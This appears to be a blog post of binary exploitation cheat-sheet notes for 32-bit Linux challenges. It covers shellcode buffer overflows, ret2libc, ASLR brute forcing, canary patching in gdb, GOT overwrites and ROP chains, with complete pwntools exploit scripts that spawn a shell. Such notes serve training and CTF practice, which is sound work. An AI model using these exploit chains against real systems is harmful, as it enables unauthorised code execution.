 |
|
#install libc6-i386 when working on 32bit challenges from 64-bit
sudo apt install libc6-i386
# Simple BOF
# jmp_address - somewhere at the start of NOPS
NOPS + shellcode + A*(EBP_offset-len(shellcode)) + jmp_address
#When you have less buffer add the exploit in env and try t ocall it
export SHELLCODE=$(python -c 'print "\x90"*200')$(cat shellcode)
#find the size of the stack
p/d ($ebp-$esp)/4+4
#Update the size
$(python -c 'print "\x0a\xda\xff\xff"*SIZE')
#DEP/NX Bypass
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh
# DEP + ASLR Bypass
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh > payload
while true; do ./vuln $(cat payload.txt);done
#Canary Bypass
- Set a break point on the stack right after the canary cookie creation
- Find the address of stack cookie and note it down.
- EX: DWORD PTR [esp+0x1c],eax
- x/wx $esp+0x1c
- Use RET2LIBC technique to exploit the program, then after the buffer, we will restore the canary cookie. - Buffer + SYSTEM + EXIT + /bin/sh
- Right before the cookie value is validated we pause the session and update the cookie value
- #Get the stack cookie - canary
gdb-peda$ x/wx $esp+0x1c
0xbffff05c: 0xf6f56000
> set {int}0xbffff05c=0xf6f56000
# CANARY + RELRO Bypass
#find a function that needs to be called from GOT and send both the addresses one after another
other_function sytem_address
$(python -c 'print "\x0c\xa0\x04\x08"') $(python -c 'print "\x10\x13\xe5\xb7"')
# ROP Chaining
# call printf function first then run your shell
# for single jump use popret
# for double jump use pop2ret
payload = buffer + printf_addr + pop_ret + arg_addr + system_addr + exit_addr + binsh_addr
NX with ASLR is enabled - RET2PUTS/RET2System
payload = ""
payload += "A"*140 #junk buffer
payload += p32(system) #EIP overwrite
payload += p32(exit) #return address
payload += p32(binsh) # Argument to system
ROP Exploit
from pwn import *
buffer = b"A" * 140
printf_addr = p32(0xb7e31520)
pop_ret = p32(0x80482c9)
print1_addr = p32(0x8048510)
system_addr = p32(0xb7e1d3d0)
exit_addr = p32(0xb7e105a0)
binsh_addr = p32(0xb7f5e1db)
#payload = buffer + system_addr + exit_addr + binsh_addr
payload = buffer + printf_addr + pop_ret + print1_addr + system_addr + exit_addr + binsh_addr
# Launch the vulnerable program and feed it the payload
p = process('./v1')
p.sendline(payload)
p.interactive()NX + ASLR Bypass - RET2SYSTEM
- works when write and read functions are accessible
from pwn import *
#objdump -d rop | grep ">:" --> take write address
write = p32(0x08048380)
#Get the address of functions in the GOT
#take the read address from here as we need the dynamic vlaue from GOT section
read = p32(0x0804a00c)
#instead of vuln func address - anything can be here as we are just looking to exec it to gain leak address
some_func_addr = p32(0x080484c6)
# write(1,address_read_GOT,4)
leak = "A"*140 + write + some_func_addr + "\x01\x00\x00\x00" + read + "\x04\x00\x00\x00"
exploit = process("./vuln", shell=True)
exploit.sendline(leak)
read_addr = unpack(exploit.recv(4))
print ("[+] Read Address is at :", hex(read_addr))
system_addr = read_addr - 0xa8810
binsh_addr = read_addr - 0xfff69d45
exit_addr = read_addr - 0xb55c0
print ("[+] System Address is at :", hex(system_addr))
print ("[+] binsh Address is at :", hex(binsh_addr))
print ("[+] Exit Address is at :", hex(exit_addr))
shell = "A"*140 + pack(system_addr) + pack(exit_addr) + pack(binsh_addr)
exploit.sendline(shell)
exploit.interactive()
GET ENV Address
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char *ptr;
if(argc < 3) {
printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]); /* get env var location */
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
printf("%s will be at %p\n", argv[1], ptr);
}
No comments:
Post a Comment